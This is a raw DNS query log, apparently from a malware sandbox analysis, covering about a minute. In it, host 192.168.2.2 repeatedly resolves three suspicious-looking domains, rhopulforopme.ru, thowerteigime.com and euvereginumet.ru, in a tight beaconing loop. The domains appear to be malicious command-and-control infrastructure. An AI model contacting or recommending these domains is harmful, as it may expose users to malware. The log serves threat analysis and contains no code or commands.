                        Apr 26, 2023 12:39:33.082050085 CEST192.168.2.21.1.1.10xf56bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.510412931 CEST192.168.2.21.1.1.10x24ecStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.533642054 CEST192.168.2.21.1.1.10x4129Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.564184904 CEST192.168.2.21.1.1.10x9110Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:33.955858946 CEST192.168.2.21.1.1.10x4784Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.142606974 CEST192.168.2.21.1.1.10x9d65Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.166587114 CEST192.168.2.21.1.1.10x7f5bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.523588896 CEST192.168.2.21.1.1.10xfd09Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.545706034 CEST192.168.2.21.1.1.10x4f35Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.570679903 CEST192.168.2.21.1.1.10x4b63Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:34.946841955 CEST192.168.2.21.1.1.10x3017Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.156472921 CEST192.168.2.21.1.1.10x7988Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.190511942 CEST192.168.2.21.1.1.10x4ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.655541897 CEST192.168.2.21.1.1.10x709eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.684778929 CEST192.168.2.21.1.1.10xd73aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:35.710496902 CEST192.168.2.21.1.1.10xf193Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.132606983 CEST192.168.2.21.1.1.10xdfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.162673950 CEST192.168.2.21.1.1.10x95d9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.193542957 CEST192.168.2.21.1.1.10x1ffdStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.585283995 CEST192.168.2.21.1.1.10x4f3eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.607999086 CEST192.168.2.21.1.1.10xd18bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.631325960 CEST192.168.2.21.1.1.10x9582Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.913157940 CEST192.168.2.21.1.1.10x71ebStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.937490940 CEST192.168.2.21.1.1.10x6c9cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:36.967185974 CEST192.168.2.21.1.1.10x3eb8Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.281141996 CEST192.168.2.21.1.1.10x7b14Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.305591106 CEST192.168.2.21.1.1.10x120Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.328907967 CEST192.168.2.21.1.1.10x248Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.637197971 CEST192.168.2.21.1.1.10x3ca9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.768557072 CEST192.168.2.21.1.1.10x3dddStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:37.871576071 CEST192.168.2.21.1.1.10xf887Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.197439909 CEST192.168.2.21.1.1.10x1b52Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.232804060 CEST192.168.2.21.1.1.10x39ccStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.255434036 CEST192.168.2.21.1.1.10xb5b3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.570481062 CEST192.168.2.21.1.1.10x204bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.597986937 CEST192.168.2.21.1.1.10x272bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.664870024 CEST192.168.2.21.1.1.10x9b76Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.958209991 CEST192.168.2.21.1.1.10x1a31Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:38.985553026 CEST192.168.2.21.1.1.10xaa3eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.042085886 CEST192.168.2.21.1.1.10x28d3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.351525068 CEST192.168.2.21.1.1.10xc7bfStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.374178886 CEST192.168.2.21.1.1.10x8662Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.398211956 CEST192.168.2.21.1.1.10x6d54Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.682035923 CEST192.168.2.21.1.1.10xc493Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.707849979 CEST192.168.2.21.1.1.10x174eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:39.730360031 CEST192.168.2.21.1.1.10xef36Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.007927895 CEST192.168.2.21.1.1.10x36Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.035480976 CEST192.168.2.21.1.1.10xe425Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.063458920 CEST192.168.2.21.1.1.10x66ecStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.333431959 CEST192.168.2.21.1.1.10xb35Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.356144905 CEST192.168.2.21.1.1.10x1cdcStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.428198099 CEST192.168.2.21.1.1.10xb4a0Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.691144943 CEST192.168.2.21.1.1.10x3805Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.805979967 CEST192.168.2.21.1.1.10xef79Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:40.836028099 CEST192.168.2.21.1.1.10xc5d1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.118069887 CEST192.168.2.21.1.1.10x2a0aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.140348911 CEST192.168.2.21.1.1.10x1bc5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.210220098 CEST192.168.2.21.1.1.10xe0bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.495321035 CEST192.168.2.21.1.1.10x3f95Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.519398928 CEST192.168.2.21.1.1.10x607aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.544898033 CEST192.168.2.21.1.1.10xc621Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.843954086 CEST192.168.2.21.1.1.10x1f6fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.893544912 CEST192.168.2.21.1.1.10x66b1Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:41.920078039 CEST192.168.2.21.1.1.10x551bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.197684050 CEST192.168.2.21.1.1.10xa21fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.222547054 CEST192.168.2.21.1.1.10xda4eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.261782885 CEST192.168.2.21.1.1.10x3ae7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.512162924 CEST192.168.2.21.1.1.10x1ac2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.535978079 CEST192.168.2.21.1.1.10xb6cdStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.563771009 CEST192.168.2.21.1.1.10x2f32Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.824858904 CEST192.168.2.21.1.1.10x693aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.847652912 CEST192.168.2.21.1.1.10xa30bStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:42.878482103 CEST192.168.2.21.1.1.10xe2edStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.137412071 CEST192.168.2.21.1.1.10x60fdStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.161530972 CEST192.168.2.21.1.1.10xa88aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.189310074 CEST192.168.2.21.1.1.10x3ec9Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.501101017 CEST192.168.2.21.1.1.10xa451Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.524477959 CEST192.168.2.21.1.1.10x8b2aStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.548476934 CEST192.168.2.21.1.1.10xb7bStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.831583023 CEST192.168.2.21.1.1.10x1b5aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.854299068 CEST192.168.2.21.1.1.10x414cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:43.878312111 CEST192.168.2.21.1.1.10xf0ccStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.251781940 CEST192.168.2.21.1.1.10x91eStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.274286032 CEST192.168.2.21.1.1.10x500eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.297103882 CEST192.168.2.21.1.1.10xf1cbStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.578454018 CEST192.168.2.21.1.1.10x1b57Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.611851931 CEST192.168.2.21.1.1.10x8e29Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:44.637315989 CEST192.168.2.21.1.1.10x2570Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.043112993 CEST192.168.2.21.1.1.10x27f1Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.070739031 CEST192.168.2.21.1.1.10x82bcStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.104144096 CEST192.168.2.21.1.1.10x978Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.389152050 CEST192.168.2.21.1.1.10x571fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.414143085 CEST192.168.2.21.1.1.10x3e05Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.436789036 CEST192.168.2.21.1.1.10x7b3aStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.721641064 CEST192.168.2.21.1.1.10x2c5dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.745240927 CEST192.168.2.21.1.1.10x8e19Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:45.774507999 CEST192.168.2.21.1.1.10xd20cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.063013077 CEST192.168.2.21.1.1.10xe879Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.089236021 CEST192.168.2.21.1.1.10xa634Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.114190102 CEST192.168.2.21.1.1.10x6a4cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.400913000 CEST192.168.2.21.1.1.10x4fedStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.423901081 CEST192.168.2.21.1.1.10xeed4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.446404934 CEST192.168.2.21.1.1.10x4a45Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.718122005 CEST192.168.2.21.1.1.10xdc11Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.748420000 CEST192.168.2.21.1.1.10x9c3cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:46.771853924 CEST192.168.2.21.1.1.10x1e5eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.197304964 CEST192.168.2.21.1.1.10x8851Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.220606089 CEST192.168.2.21.1.1.10x4377Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.244334936 CEST192.168.2.21.1.1.10x158eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.557291031 CEST192.168.2.21.1.1.10x1d86Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.584383011 CEST192.168.2.21.1.1.10x7971Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.608306885 CEST192.168.2.21.1.1.10x20dfStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.885262966 CEST192.168.2.21.1.1.10xb794Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.910164118 CEST192.168.2.21.1.1.10xec78Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:47.932490110 CEST192.168.2.21.1.1.10xcd24Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.211174965 CEST192.168.2.21.1.1.10x7a07Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.235518932 CEST192.168.2.21.1.1.10x40c7Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.261284113 CEST192.168.2.21.1.1.10x9eb3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.549436092 CEST192.168.2.21.1.1.10x9b8cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.573126078 CEST192.168.2.21.1.1.10x1042Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.596141100 CEST192.168.2.21.1.1.10x79e1Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.918684959 CEST192.168.2.21.1.1.10x7d3cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.941415071 CEST192.168.2.21.1.1.10xc65dStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:48.966664076 CEST192.168.2.21.1.1.10xf3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.234384060 CEST192.168.2.21.1.1.10x621cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.390918016 CEST192.168.2.21.1.1.10xd9d5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.414436102 CEST192.168.2.21.1.1.10x8531Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.744971037 CEST192.168.2.21.1.1.10x228cStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.768004894 CEST192.168.2.21.1.1.10x61aaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:49.790781021 CEST192.168.2.21.1.1.10xf871Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.063132048 CEST192.168.2.21.1.1.10xa380Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.085740089 CEST192.168.2.21.1.1.10x45f4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.111629009 CEST192.168.2.21.1.1.10x2a50Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.479494095 CEST192.168.2.21.1.1.10xcbc2Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.503282070 CEST192.168.2.21.1.1.10xb81cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.528803110 CEST192.168.2.21.1.1.10xbc8dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.973819971 CEST192.168.2.21.1.1.10x5202Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:50.998435020 CEST192.168.2.21.1.1.10xd8deStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.024601936 CEST192.168.2.21.1.1.10x7fe4Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.445899010 CEST192.168.2.21.1.1.10xcc3aStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.471163034 CEST192.168.2.21.1.1.10x7880Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.500432014 CEST192.168.2.21.1.1.10x9137Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.971822023 CEST192.168.2.21.1.1.10xce48Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:51.996325016 CEST192.168.2.21.1.1.10x2b55Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.021647930 CEST192.168.2.21.1.1.10x37b2Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.406902075 CEST192.168.2.21.1.1.10x879Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.437316895 CEST192.168.2.21.1.1.10x841cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.461044073 CEST192.168.2.21.1.1.10x90bbStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.830590010 CEST192.168.2.21.1.1.10x30e5Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.861413956 CEST192.168.2.21.1.1.10xef52Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:52.889728069 CEST192.168.2.21.1.1.10x1078Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.196815014 CEST192.168.2.21.1.1.10x3a1dStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.220861912 CEST192.168.2.21.1.1.10x4da0Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.246109962 CEST192.168.2.21.1.1.10xf38Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.523694038 CEST192.168.2.21.1.1.10x7a7fStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.547945023 CEST192.168.2.21.1.1.10xa0e8Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.571973085 CEST192.168.2.21.1.1.10xc521Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.945209026 CEST192.168.2.21.1.1.10x5fd8Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.972563028 CEST192.168.2.21.1.1.10x39f9Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:53.996865988 CEST192.168.2.21.1.1.10xf790Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.244370937 CEST192.168.2.21.1.1.10xfea3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.267894030 CEST192.168.2.21.1.1.10x987eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.298515081 CEST192.168.2.21.1.1.10xf29eStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.678462982 CEST192.168.2.21.1.1.10xc7b3Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.702570915 CEST192.168.2.21.1.1.10x4ae2Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.737612963 CEST192.168.2.21.1.1.10x138cStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:54.983362913 CEST192.168.2.21.1.1.10x47d7Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.012964010 CEST192.168.2.21.1.1.10x8c2cStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:39:55.035898924 CEST192.168.2.21.1.1.10x13aaStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:28.984071016 CEST192.168.2.21.1.1.10xaed0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.007978916 CEST192.168.2.21.1.1.10x641eStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.035300016 CEST192.168.2.21.1.1.10x85cdStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.541404963 CEST192.168.2.21.1.1.10x4e1bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.565109968 CEST192.168.2.21.1.1.10x5286Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.589232922 CEST192.168.2.21.1.1.10x10b6Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:29.983516932 CEST192.168.2.21.1.1.10xef08Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.111429930 CEST192.168.2.21.1.1.10xd5e4Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.137455940 CEST192.168.2.21.1.1.10x56ffStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.418673992 CEST192.168.2.21.1.1.10xc6c9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.441540003 CEST192.168.2.21.1.1.10x95c5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.464087963 CEST192.168.2.21.1.1.10xce51Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.779587030 CEST192.168.2.21.1.1.10x6c15Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.805891037 CEST192.168.2.21.1.1.10xf223Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:30.832779884 CEST192.168.2.21.1.1.10xed4dStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.118180037 CEST192.168.2.21.1.1.10x1ce4Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.140866041 CEST192.168.2.21.1.1.10x8ef5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.180767059 CEST192.168.2.21.1.1.10xf0c7Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.541749954 CEST192.168.2.21.1.1.10x65e9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.567431927 CEST192.168.2.21.1.1.10x9c36Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.595216990 CEST192.168.2.21.1.1.10xe798Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.909266949 CEST192.168.2.21.1.1.10xd9f9Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.932838917 CEST192.168.2.21.1.1.10xd559Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:31.958781004 CEST192.168.2.21.1.1.10xe38fStandard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.265667915 CEST192.168.2.21.1.1.10xa5afStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.289447069 CEST192.168.2.21.1.1.10x2ccaStandard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.316984892 CEST192.168.2.21.1.1.10xef73Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.671447039 CEST192.168.2.21.1.1.10x7b0bStandard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.695249081 CEST192.168.2.21.1.1.10xa257Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:32.722840071 CEST192.168.2.21.1.1.10x71f3Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.045428991 CEST192.168.2.21.1.1.10xfbc0Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.069462061 CEST192.168.2.21.1.1.10x89a5Standard query (0)euvereginumet.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.097723961 CEST192.168.2.21.1.1.10x5024Standard query (0)rhopulforopme.ruA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:33.397084951 CEST192.168.2.21.1.1.10xe042Standard query (0)thowerteigime.comA (IP address)IN (0x0001)false
